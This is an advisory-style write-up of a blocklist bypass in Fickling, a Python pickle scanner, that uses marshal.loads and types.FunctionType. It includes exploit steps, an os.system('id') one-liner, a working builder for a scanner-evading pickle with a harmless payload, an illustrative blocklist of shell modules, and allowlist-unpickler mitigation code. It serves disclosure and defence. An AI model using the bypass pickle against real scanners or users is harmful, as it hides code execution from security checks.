Fickling, Unsafe Module Bypass


The vulnerability is a detection bypass in Fickling, the static analysis tool for Python pickle files. Pickle deserialization can execute arbitrary code because a pickle stream may resolve any module attribute (the GLOBAL and STACK_GLOBAL opcodes) and call it (the REDUCE opcode). Fickling maintains a blocklist of unsafe imports (such as os.system) and flags files that reference them. The bypass worked because the `marshal` and `types` modules were missing from that blocklist.

An attacker could craft a pickle that calls `marshal.loads()` on a serialized code object, wraps the resulting code object in a callable with `types.FunctionType()`, and then invokes it. No blocklisted import appears in the stream; the real logic is hidden inside the opaque marshal blob. When Fickling analyzed such a file, its static analysis did not recognize these imports as dangerous and labeled the file "LIKELY_SAFE". Separately, malformed pickles could exhaust the stack and crash the interpreter, a denial-of-service issue distinct from the bypass. The core security failure was the incomplete blocklist, which let a file that executes code on load pass as safe.
Platform: Fickling
Version: Prior to PR186
Vulnerability: Unsafe Module Bypass
Severity: Critical
Date: Report Published 2023

Prediction: 2023-10-15

What Undercode Say:

`fickling -s malicious.pickle`

`python3 -c 'import pickle, marshal, types; payload = marshal.dumps((lambda: __import__("os").system("id")).__code__); data = b"(…pickle ops…)"; pickle.loads(data)'`

`cat safety_result.json | grep severity`

How to Exploit:

1. Attacker builds a pickle whose opcodes import `marshal.loads()` and call it on a marshalled code object, the bytecode payload.

2. The pickle then imports `types.FunctionType()`, wraps the code object into a callable, and invokes it with REDUCE, so no blocklisted module name ever appears in the stream.

3. Victim scans the file with Fickling and gets a false 'LIKELY_SAFE', because neither `marshal` nor `types` was on the blocklist.

4. Victim unpickles the file and the hidden bytecode executes with the victim's privileges.
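
To make the bypass in the description above and in the four steps concrete, here is an added example (not code from this page or from the Fickling project). It hand-assembles the pickle the steps describe, lists the globals it resolves with pickletools without loading it, and shows the verdict a blocklist gives before and after `marshal` and `types` are added. The two blocklists and the LIKELY_SAFE / LIKELY_UNSAFE labels are illustrative stand-ins for Fickling's own tables, and the payload is a harmless constant expression standing in for attacker bytecode.

```python
import marshal
import pickle
import pickletools
import struct


def build_marshal_pickle(expr: str) -> bytes:
    """Hand-assemble a pickle that runs: types.FunctionType(marshal.loads(blob), {})().

    `expr` is compiled to a code object standing in for attacker bytecode; the
    marshal format is interpreter-specific, so dump and load on the same Python.
    """
    blob = marshal.dumps(compile(expr, "<marshal-payload>", "eval"))
    return b"".join([
        b"\x80\x03",                                 # PROTO 3
        b"ctypes\nFunctionType\n",                   # GLOBAL  types.FunctionType
        b"cmarshal\nloads\n",                        # GLOBAL  marshal.loads
        b"B" + struct.pack("<I", len(blob)) + blob,  # BINBYTES: marshalled code object
        b"\x85",                                     # TUPLE1  -> (blob,)
        b"R",                                        # REDUCE  -> marshal.loads(blob)
        b"}",                                        # EMPTY_DICT: globals for the function
        b"\x86",                                     # TUPLE2  -> (code, {})
        b"R",                                        # REDUCE  -> types.FunctionType(code, {})
        b")",                                        # EMPTY_TUPLE
        b"R",                                        # REDUCE  -> function(): payload runs here
        b".",                                        # STOP
    ])


# Opcodes whose argument is a string; STACK_GLOBAL (protocol 4+) takes its
# module and attribute names from the two most recent of these.
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def extract_imports(data: bytes) -> list:
    """Statically list every module.attr the pickle resolves, without loading it."""
    imports, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":                      # arg is "module attr"
            module, name = arg.split(" ", 1)
            imports.append(f"{module}.{name}")
        elif op.name == "STACK_GLOBAL":
            imports.append(f"{strings[-2]}.{strings[-1]}")
        elif op.name in STRING_OPS:
            strings.append(arg)
    return imports


# Illustrative blocklists (assumed for this example, not Fickling's actual tables):
# the "before" set omits marshal and types, which is the gap the bypass used.
BLOCKLIST_BEFORE = {"os", "posix", "nt", "subprocess", "sys", "builtins", "shutil"}
BLOCKLIST_AFTER = BLOCKLIST_BEFORE | {"marshal", "types"}


def classify(data: bytes, blocklist: set) -> str:
    """Blocklist verdict, with labels modelled on Fickling's severity names."""
    modules = {ref.split(".", 1)[0] for ref in extract_imports(data)}
    return "LIKELY_UNSAFE" if modules & blocklist else "LIKELY_SAFE"


def load_untrusted(data: bytes):
    """What the victim does at step 4: a plain pickle.loads, which runs the payload."""
    return pickle.loads(data)


# A protocol-4 pickle from the real pickler, to show STACK_GLOBAL is caught as well.
STACK_GLOBAL_SAMPLE = pickle.dumps(marshal.loads, protocol=4)


if __name__ == "__main__":
    data = build_marshal_pickle("'payload executed'")
    print(extract_imports(data))              # ['types.FunctionType', 'marshal.loads']
    print(classify(data, BLOCKLIST_BEFORE))   # LIKELY_SAFE   <- the bypass
    print(classify(data, BLOCKLIST_AFTER))    # LIKELY_UNSAFE
    print(extract_imports(STACK_GLOBAL_SAMPLE))  # ['marshal.loads']
    print(load_untrusted(data))               # payload executed
```

The scan never executes anything: `pickletools.genops` only decodes opcodes, which is exactly why a scanner can see `marshal.loads` and `types.FunctionType` but not what the marshalled bytes will do. That is the general lesson of the bypass: any module that can turn opaque bytes into executable code has to be treated as dangerous, not just the ones that shell out directly.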

Protection from this CVE

Update Fickling to a release that includes PR186, which adds the missing modules to the blocklist.

Never unpickle untrusted data.

Prefer allowlist-based loading (a restricted `Unpickler.find_class` that resolves only the globals your application needs) over blocklist scanning, which fails open whenever a dangerous module is missing from the list.
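
As an added example of the allowlist approach recommended above (not code from this page or from Fickling), the following restricted unpickler refuses every global that is not explicitly permitted, so `marshal.loads`, `types.FunctionType` and `os.system` are all rejected whether or not any blocklist knows about them. The allowlist contents and the sample pickles are constructed for this example.

```python
import collections
import io
import pickle

# Allowlist of (module, attribute) pairs this application is known to need
# (assumed for this example). Anything else is refused, so marshal.loads,
# types.FunctionType and os.system are rejected regardless of whether a
# scanner's blocklist has heard of them.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
}


class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that fails closed: only allowlisted globals resolve."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refused global {module}.{name}")


def safe_loads(data: bytes):
    return AllowlistUnpickler(io.BytesIO(data)).load()


def try_load(data: bytes):
    """Return (True, object) on success or (False, reason) when a global is refused."""
    try:
        return True, safe_loads(data)
    except pickle.UnpicklingError as exc:
        return False, str(exc)


# Constructed samples.
PLAIN_DATA = pickle.dumps({"users": ["alice", "bob"], "count": 2})     # no globals at all
ORDERED = pickle.dumps(collections.OrderedDict([("a", 1), ("b", 2)]))  # needs an allowed global
# Hand-built: GLOBAL marshal.loads, SHORT_BINBYTES b"", TUPLE1, REDUCE, STOP. The refusal
# happens at the GLOBAL opcode, before marshal.loads is ever called.
MARSHAL_REF = b"cmarshal\nloads\n" + b"C\x00" + b"\x85R."
OS_SYSTEM_REF = b"cos\nsystem\n."        # pickle.loads would hand back os.system itself


if __name__ == "__main__":
    for label, sample in [("plain", PLAIN_DATA), ("ordered", ORDERED),
                          ("marshal", MARSHAL_REF), ("os.system", OS_SYSTEM_REF)]:
        print(label, try_load(sample))
```

The refusal happens inside `find_class`, which the unpickler calls when it meets a GLOBAL or STACK_GLOBAL opcode, so the dangerous callable is never even resolved, let alone invoked by the REDUCE that follows. Note that this only protects your own loading code; it does nothing for a scanner's verdict, and it is no substitute for the first rule above, never unpickling untrusted data at all.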

Impact:

Arbitrary code execution.

Security tool bypass.

Potential system compromise.


Sources:

Reported By: github.com
